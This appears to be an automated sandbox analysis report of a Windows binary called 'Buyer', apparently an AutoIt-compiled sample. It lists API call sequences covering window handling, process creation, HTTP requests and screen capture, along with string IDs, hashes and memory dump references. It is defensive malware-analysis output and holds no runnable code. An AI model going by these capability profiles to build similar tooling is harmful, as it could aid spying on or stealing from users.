                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00FA616B
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FA617B
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00FA6181
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FA61A2
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FA61BC
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA61C5
                                                                                                    • _wcslen.LIBCMT ref: 00FA622C
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00FA6268
                                                                                                    • GetDesktopWindow.USER32 ref: 00FA626E
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FA6275
                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00FA62CC
                                                                                                    • GetClientRect.USER32(?,?), ref: 00FA62D9
                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00FA62FE
                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FA6328
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 895679908-0
                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00FC05AE
                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00FC05B9
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FC05C4
                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00FC05CF
                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00FC05DA
                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00FC05E5
                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00FC05F0
                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00FC05FB
                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00FC0606
                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00FC0611
                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00FC061C
                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00FC0627
                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00FC0632
                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00FC063D
                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00FC0648
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00FC0653
                                                                                                    • GetCursorInfo.USER32(?), ref: 00FC0663
                                                                                                    • GetLastError.KERNEL32 ref: 00FC06A5
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215588206-0
                                                                                                    APIs
                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F60416
                                                                                                      • Part of subcall function 00F6043D: InitializeCriticalSectionAndSpinCount.KERNEL32(010116FC,00000FA0,6041021D,?,?,?,?,00F82703,000000FF), ref: 00F6046C
                                                                                                      • Part of subcall function 00F6043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F82703,000000FF), ref: 00F60477
                                                                                                      • Part of subcall function 00F6043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F82703,000000FF), ref: 00F60488
                                                                                                      • Part of subcall function 00F6043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F6049E
                                                                                                      • Part of subcall function 00F6043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F604AC
                                                                                                      • Part of subcall function 00F6043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F604BA
                                                                                                      • Part of subcall function 00F6043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F604E5
                                                                                                      • Part of subcall function 00F6043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F604F0
                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00F60437
                                                                                                      • Part of subcall function 00F603F3: __onexit.LIBCMT ref: 00F603F9
                                                                                                    Strings
                                                                                                    • WakeAllConditionVariable, xrefs: 00F604B2
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F60472
                                                                                                    • SleepConditionVariableCS, xrefs: 00F604A4
                                                                                                    • InitializeConditionVariable, xrefs: 00F60498
                                                                                                    • kernel32.dll, xrefs: 00F60483
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 66158676-1714406822
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                    • API String ID: 176396367-1603158881
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00FDDC1C), ref: 00FB4C96
                                                                                                    • _wcslen.LIBCMT ref: 00FB4CAA
                                                                                                    • _wcslen.LIBCMT ref: 00FB4D08
                                                                                                    • _wcslen.LIBCMT ref: 00FB4D63
                                                                                                    • _wcslen.LIBCMT ref: 00FB4DAE
                                                                                                    • _wcslen.LIBCMT ref: 00FB4E16
                                                                                                      • Part of subcall function 00F5FD18: _wcslen.LIBCMT ref: 00F5FD23
                                                                                                    • GetDriveTypeW.KERNEL32(?,01007C00,00000061), ref: 00FB4EB2
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                    • Opcode ID: 265e5559f96899af8a5c8efc3984e20aeadb06c9d5b46fbe5f7e6d8d5e82eb83
                                                                                                    • Instruction ID: 5bdd5bb64ec0451fcfda16782cb408f2794522d549ac8fafe477952de65c7295
                                                                                                    • Opcode Fuzzy Hash: 265e5559f96899af8a5c8efc3984e20aeadb06c9d5b46fbe5f7e6d8d5e82eb83
                                                                                                    • Instruction Fuzzy Hash: 4AB1D331A083129FC710EF29CA90ABAB7E5BF94720F50491DF596C7292D734E845EF92
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FCB91F
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB937
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB95B
                                                                                                    • _wcslen.LIBCMT ref: 00FCB987
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB99B
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB9BD
                                                                                                    • _wcslen.LIBCMT ref: 00FCBAB9
                                                                                                      • Part of subcall function 00FB0C78: GetStdHandle.KERNEL32(000000F6), ref: 00FB0C97
                                                                                                    • _wcslen.LIBCMT ref: 00FCBAD2
                                                                                                    • _wcslen.LIBCMT ref: 00FCBAED
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FCBB3D
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00FCBB8E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FCBBC0
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCBBD1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCBBE3
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCBBF5
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FCBC6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178637699-0
                                                                                                    • Opcode ID: 292baaeb4cb71a8749fbe6cb4523610cb0c1c1d95bc1b6ac70937639c50e6ab9
                                                                                                    • Instruction ID: 31f068e922d3a068207475cf278956f9601fc9a09ce71dc1e3909024a4c73cc6
                                                                                                    • Opcode Fuzzy Hash: 292baaeb4cb71a8749fbe6cb4523610cb0c1c1d95bc1b6ac70937639c50e6ab9
                                                                                                    • Instruction Fuzzy Hash: 21F1C0359043419FCB14EF24C992F6ABBE5BF85320F18855DF8854B2A2CB35EC41EB52
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FDDC1C), ref: 00FC4842
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FC4854
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00FDDC1C), ref: 00FC4879
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00FDDC1C), ref: 00FC48C5
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00FDDC1C), ref: 00FC492F
                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00FC49E9
                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FC4A4F
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FC4A79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                    • API String ID: 354098117-199464113
                                                                                                    • Opcode ID: 3032024ca82bddfef307470b244c8c4e1a01c8dc0cf2fda51b816c0d4d627402
                                                                                                    • Instruction ID: 0d625fbd0f0c8bc6bcf1c0639c89222faa023545c1cf092daa7a936278115ae8
                                                                                                    • Opcode Fuzzy Hash: 3032024ca82bddfef307470b244c8c4e1a01c8dc0cf2fda51b816c0d4d627402
                                                                                                    • Instruction Fuzzy Hash: 34124A71A0020AAFDB14DF94C995FAEBBB5FF85314F14809CE8059B261D731ED46EBA0
                                                                                                    APIs
                                                                                                    • GetMenuItemCount.USER32(010129B0), ref: 00F83202
                                                                                                    • GetMenuItemCount.USER32(010129B0), ref: 00F832B2
                                                                                                    • GetCursorPos.USER32(?), ref: 00F832F6
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F832FF
                                                                                                    • TrackPopupMenuEx.USER32(010129B0,00000000,?,00000000,00000000,00000000), ref: 00F83312
                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F8331E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 36266755-4108050209
                                                                                                    • Opcode ID: d7ca250b6a46d612d9c96a00d823e3b7fcb83f31794e37840f4be1fdc8a4f765
                                                                                                    • Instruction ID: 0aa6c915ab87e574f3b821b347ea1dd6598c31df0eb94773372c003907e73d64
                                                                                                    • Opcode Fuzzy Hash: d7ca250b6a46d612d9c96a00d823e3b7fcb83f31794e37840f4be1fdc8a4f765
                                                                                                    • Instruction Fuzzy Hash: F3713771A40205BFFB21AF28DC4AFEABF69FF05B68F144206F514661E1C7B59910E790
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 00FD74B6
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FD752A
                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FD754C
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD755F
                                                                                                    • DestroyWindow.USER32(?), ref: 00FD7580
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F40000,00000000), ref: 00FD75AF
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD75C8
                                                                                                    • GetDesktopWindow.USER32 ref: 00FD75E1
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FD75E8
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FD7600
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FD7618
                                                                                                      • Part of subcall function 00F59B74: GetWindowLongW.USER32(?,000000EB), ref: 00F59B82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                    • String ID: 0$tooltips_class32
                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                    • Opcode ID: e92b54c80d31bea01349b6b3ccce8a33fa70a58cfc1565b2d742bd4481602412
                                                                                                    • Instruction ID: dcff29689b00fb895880ad95b2315c3bd9828454904cb92b8b08acd36428c797
                                                                                                    • Opcode Fuzzy Hash: e92b54c80d31bea01349b6b3ccce8a33fa70a58cfc1565b2d742bd4481602412
                                                                                                    • Instruction Fuzzy Hash: 2F717F71505344AFD721EF28C844FAA7BEAFB89314F18091EF9858B361E775E901EB11
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00FD9833
                                                                                                      • Part of subcall function 00FD7D3F: ClientToScreen.USER32(?,?), ref: 00FD7D65
                                                                                                      • Part of subcall function 00FD7D3F: GetWindowRect.USER32(?,?), ref: 00FD7DDB
                                                                                                      • Part of subcall function 00FD7D3F: PtInRect.USER32(?,?,00FD9275), ref: 00FD7DEB
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD989C
                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FD98A7
                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FD98CA
                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FD9911
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD992A
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00FD9941
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00FD9963
                                                                                                    • DragFinish.SHELL32(?), ref: 00FD996A
                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FD9A5D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                    • API String ID: 221274066-3440237614
                                                                                                    • Opcode ID: b2670279ef3b3f285c4fa26f5454bc1b0fd4c3e282359a03a29abd59429d2b8a
                                                                                                    • Instruction ID: 26d6467bed73b15230137bdaae4e40233ccd219dc4aa79cd90c55fbfc4f89faf
                                                                                                    • Opcode Fuzzy Hash: b2670279ef3b3f285c4fa26f5454bc1b0fd4c3e282359a03a29abd59429d2b8a
                                                                                                    • Instruction Fuzzy Hash: 8E61AE71508305AFC301EF64DC85D9FBBE9FF89750F00091EF991922A1DB74AA49EB52
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FBCC1F
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FBCC32
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FBCC46
                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FBCC5F
                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00FBCCA2
                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FBCCB8
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FBCCC3
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FBCCF3
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FBCD4B
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FBCD5F
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00FBCD6A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                    • Opcode ID: 034b95066f3d41bc0c81e4e2cc382ad131aca8a142b679670ca3c29d812b754b
                                                                                                    • Instruction ID: 556520a180b40000f5c1c3e76f93d7aac22cc4c213c6cfd0cb8fdf025162ed5a
                                                                                                    • Opcode Fuzzy Hash: 034b95066f3d41bc0c81e4e2cc382ad131aca8a142b679670ca3c29d812b754b
                                                                                                    • Instruction Fuzzy Hash: 23515BB5901608BFDB219F76CC48AEB7BBCFF08754F10842AF95996250D734D944AFA0
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FD63F7,?,?), ref: 00FD8C7E
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8C8E
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8C99
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CA6
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CB4
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CC3
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CCC
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CD3
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FD63F7,?,?,00000000,?), ref: 00FD8CE4
                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FE0C20,?), ref: 00FD8CFD
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FD8D0D
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00FD8D2D
                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00FD8D5D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FD8D85
                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FD8D9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3840717409-0
                                                                                                    • Opcode ID: f61f638f7a92a8fc69ec3e91b86c2bcf64a0221620e96f9eb908acdfb35886f9
                                                                                                    • Instruction ID: 144ee4f8c16c91199ab841f902a49c7d4237ded7ca5b0c2a9f86a8ee1d9ff7b9
                                                                                                    • Opcode Fuzzy Hash: f61f638f7a92a8fc69ec3e91b86c2bcf64a0221620e96f9eb908acdfb35886f9
                                                                                                    • Instruction Fuzzy Hash: 96414975601208BFDB119F65DC48EAE7BBAFF89761F14405AF906D72A0DB309902EB20
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00FB1BEB
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00FB1BF4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FB1C00
                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FB1CE4
                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00FB1D40
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FB1DF1
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FB1E75
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FB1EC1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FB1ED0
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00FB1F0C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                    • Opcode ID: 13e29baea9eccfdc74d2e6c76e489730d61a397997ccbbaee98754d1c1f52d71
                                                                                                    • Instruction ID: bd20893f64382943f05a84bd2364077fb9287fb7d13fbac8e28ef28537b3c0cc
                                                                                                    • Opcode Fuzzy Hash: 13e29baea9eccfdc74d2e6c76e489730d61a397997ccbbaee98754d1c1f52d71
                                                                                                    • Instruction Fuzzy Hash: 07D1F5B2A40115DBDB10EF66D894BE9BBB4FF05700F648455E805AB281CB38EC54FFA1
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00FC2D5F
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FC2D6F
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00FC2D7B
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00FC2D88
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00FC2DF4
                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00FC2E33
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00FC2E57
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FC2E5F
                                                                                                    • DeleteObject.GDI32(?), ref: 00FC2E68
                                                                                                    • DeleteDC.GDI32(?), ref: 00FC2E6F
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00FC2E7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
